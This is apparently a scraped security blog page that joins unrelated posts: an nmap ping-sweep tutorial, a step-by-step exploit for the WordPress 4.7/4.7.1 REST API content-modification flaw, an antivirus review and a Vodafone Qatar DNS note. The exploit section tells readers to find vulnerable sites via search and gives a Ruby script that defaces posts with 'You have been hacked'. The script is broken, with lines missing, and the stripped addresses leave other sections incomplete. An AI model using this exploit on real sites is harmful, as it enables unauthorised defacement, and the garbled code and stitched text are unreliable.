PenTest Tool: Ping Sweep

Ping Sweep is similar to Ping but the difference is the number of IP addresses that can be scanned with these tools. Ping Sweep is used to scan a network or large number of IP addresses to find out how many hosts are Live, where as, Ping is used to scan a single host or IP address.

Ping Sweep and Ping, both, sends out ICMP echo request to host and wait for ICMP echo reply to determine the host status.

Ping Sweep Tools:

nmap command:

-sP option does only Ping scan to determine Live status of host.

c:\Tools\nmap-7.70>nmap.exe -sP
Starting Nmap 7.70 ( ) at 2018-12-01 11:41 Arab Standard Time
Nmap scan report for
Host is up (0.012s latency).
MAC Address: 4C:1F:CC:2B:04:C0 (Huawei Technologies)
Nmap scan report for
Host is up (0.033s latency).
MAC Address: 54:60:09:0D:2E:6E (Google)
Nmap scan report for
Host is up (0.043s latency).
MAC Address: 9A:FC:11:B6:6C:BA (Unknown)
Nmap scan report for
Host is up (0.081s latency).
MAC Address: C0:9F:05:65:13:99 (Guangdong Oppo Mobile Telecommunications)
Nmap scan report for
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 12.03 seconds


In networks, where ICMP is blocked at the firewall, you certainly cannot use above command to determine the host status. Instead, use TCP sync command to determine host status.

c:\Tools\nmap-7.70>nmap -sS -p80
Starting Nmap 7.70 ( ) at 2018-12-01 12:07 Arab Standard Time
Nmap scan report for
Host is up (0.0048s latency).

80/tcp open http
MAC Address: 4C:1F:CC:2B:04:C0 (Huawei Technologies)

Nmap done: 1 IP address (1 host up) scanned in 4.45 seconds

GUI Tools: 

There are plenty of GUI tools that does similar job, one among them is ping sweep | 

The tool calls Nmap with the proper parameters in order to do the sweeping. Behind the scene, Nmap sends multiple probes to the target systems to provoque responses which could suggest the hosts’ liveness:

  • ICMP echo requests
  • TCP SYN on ports 80,443
  • ICMP timestamp requests

WordPress REST API Exploit Step by Step

Vulnerability                     Unauthenticated Page/Post Content Modification via REST API
Vulnerable WP Versions : 4.7 and 4.7.1
Vulnerability Description: If the website is not patched, the vulnerability could allow a malicious attacker to modify the content of his post or page on a WP site.

Patched Version              : 4.7.2

Additional Info                     : REST API was added in WP 4.4 released on Dec 2015, however you need plugins to activate API. Later in WP 4.7 version, no plugins are needed, it comes enabled by default. This vulnerability is specific to REST API, hence 4.7.0 and 4.7.1 are directly affected by this vulnerability as API is enabled by default.


In this demonstration, we are showing you the exact steps to exploit WordPress websites running vulnerable version 4.7 and 4.7.1. And the tool that I am using here is Advanced Rest Client Chrome add-on.


STEP 1: Find OUT Website Running Wordpress

Google is your door, search for something similar to this and I got on hands plenty of WP websites.

However, we are not going to try on any of those websites, of course I do not want to trouble someone or get into trouble as well. I am going to demonstrate on my local WordPress for you. And this is the page that we are going to change content without any authorization.



View page source of the website to identify the running WP Version. If the version is either 4.7 or 4.7.1, then the website is vulnerable and you can proceed further.


STEP 3: Identify WP Post ID

Each post in WP is associated with a unique post ID, which is its reference. You need to find out using REST API Client. Here 3 is the post ID of the page shown in STEP 1.


STEP 4: Execute Now

You should mention your post ID in the api link. here I mentioned my Post ID 3 as ?id=3ABC

And we got the website hacked!


Alternately  you can use following exploit Code 

require ‘rest-client’
require ‘json’
puts “Enter Target URI (With wp directory)”
targeturi = gets.chomp
puts “Enter Post ID”
postid = gets.chomp.to_i
response =
“id” => “#{postid}justrawdata”,
“title” => “You have been hacked”,
“content” => “Hacked please update your wordpress version”
:content_type => :json,
:accept => :json
) {|response, request, result| response }
if(response.code == 200)
puts “Done! ‘#{targeturi}/index.php?p=#{postid}'”
puts “This site is not Vulnerable”

source: exploit-db

Best Antivirus Solution for Home PC – Windows 10 – Review 2017

This article and its references are very specific to Home computers running Windows 10 OS, if you are looking for some other operating system, then you should refer somewhere else.

In the recent times, we have heard enough about cyber threats and data leakage. None of us want to be hacked. Everyone wants to have the best antivirus solution in their personal computer to protect their data, email, social networks, browsing information, …etc. There are few independent organizations – and who perform comparative tests and reviews for antivirus software, antimalware tools and security software. We reviewed all of their reports, summarized them and recommend you these best antivirus solutions – ‘Kaspersky Lab Internet Security 2017′, ‘Avira Antivirus Pro 2016’ and ‘Bitdefender Internet Security 2016 & 2017’ for your Windows 10 OS Computers at home.

All home user looks for 2 objectives on their antivirus solution, first is to have full protection to their computer and secondly, no degradation of their computer performance.

In order to gain full protection benefit of antivirus solution, it is very important that you should be running an up-to-date windows 10 OS and more up-to-date third party software (e.g Adobe reader, Microsoft Office) in your computer. Remember that all the test result of these independent organizations are performed on up-to-date computers and not on pirated or outdated computer. Hence, in order to minimize the risk of being infected through exploits, keep your computer up-to-date.

Now, lets give you few hints about the second objective and the most common problem reported by users – ‘my antivirus is slowing down my system’. But users need to understand that other factors also play a role in system performance, and if users follow simple rules, system performance can be improved noticeably.

  1. Upgrade your PC hardware. You shouldn’t be running a ten-year-old hardware. If possible, buy a PC that meets minimum requirements of OS and software running on it, atleast 4GB Ram, multi-core processor and run only one security real-time protection program.
  2. Clean up the unwanted content of your hard disk. If your hard disk is full, your system performance will suffer accordingly. Leave at least 25% disk space free.
  3. Defragment your hard disk regularly. A fragmented hard disk can have a big impact on system performance as well as considerably increasing the time needed to boot up the system.

Having said all these tips, lets look at few international reports for choosing best antivirus solution –

AVTEST  – A Strong Player in the Field of Antivirus Research for Over 15 Years. The AV-TEST Institute is a leading international and independent service provider in the fields of IT security and anti-virus research.

The aim of the research work carried out by AV-TEST is to directly detect the latest malware, to analyse it using state-of-the-art methods and to inform our customers of the top-quality results obtained.


Kaspersky Lab Internet Security 2017 provides 100% protection against 0-day malware attacks and 99.9% detection of prevalent attacks, without compromising PC performance. As per AVTEST report, there was 1 false alarm, but that’s fine, it is not going to harm you anyway. All we want is total protection and best PC performance.

Avira Antivirus Pro 2016 has failed in 0.3% of its sample tests of prevalent malware detection, however its protection is 99.7% which is above the industry average. Additionally, your PC performance is no way affected and no false alarms.

Bitdefender Internet Security 2016 & 2017 provides 100% PC protection against 0-day malware attacks and prevalent malwares, however user may experience slight slowness in their PC performance. If you are more concerned about security and accept slight reduction in PC performance, go ahead with Bitdefender without hesitation.


AV-Comparatives is an independent organization offering systematic testing that checks whether security software, such as PC/Mac-based antivirus products and mobile security solutions, lives up to its promises. Certification by AV-Comparatives provides an official seal of approval for software performance which is globally recognized.

AV-Comparatives works closely with several academic institutions, especially the University of Innsbruck’s Department of Computer Science, to provide scientific testing methods.


AV-Comparatives report that Kaspersky Internet Security 2017, Avira Antivirus Pro and Bitdefender Internet Security were succeeded in detecting 99.9% of malware files.

There is some contradictory to AVTEST and AV Comparatives results on PC performance test especially on Kaspersky. As per AV Comparatives, use of Kaspersky will cause some impact on system performance and use some percentage of system resources, compared to Avira and Bitdefender. However, you no need to worry, AV Comparatives (reference link) awarded Advanced+ (highest grade) to Avira, Bitdefender and also Kaspersky for PC performance, so 5.4 is probably too low value to worry.

Hope this article helps you to choose best antivirus for your home PC. And we assure that we update this article as and when new reports were released by these major av tests organizations.

Real-World Protection Test July – November 2016′ report of is not considered as the tests were performed under Windows 7 Home Premium SP1 64-bit.

SE-Labs report is also not considered as we couldn’t find out the OS on which their tests were executed.


We welcome your feedback and stay SECURE !

Vodafone Qatar DNS Servers

Following are official DNS Servers of Vodafone, Qatar

Primary DNS Server:

Secondary DNS Server:

Note: is decommissioned as on 15th Jun 2018. If you are using, then migrate to above DNS servers.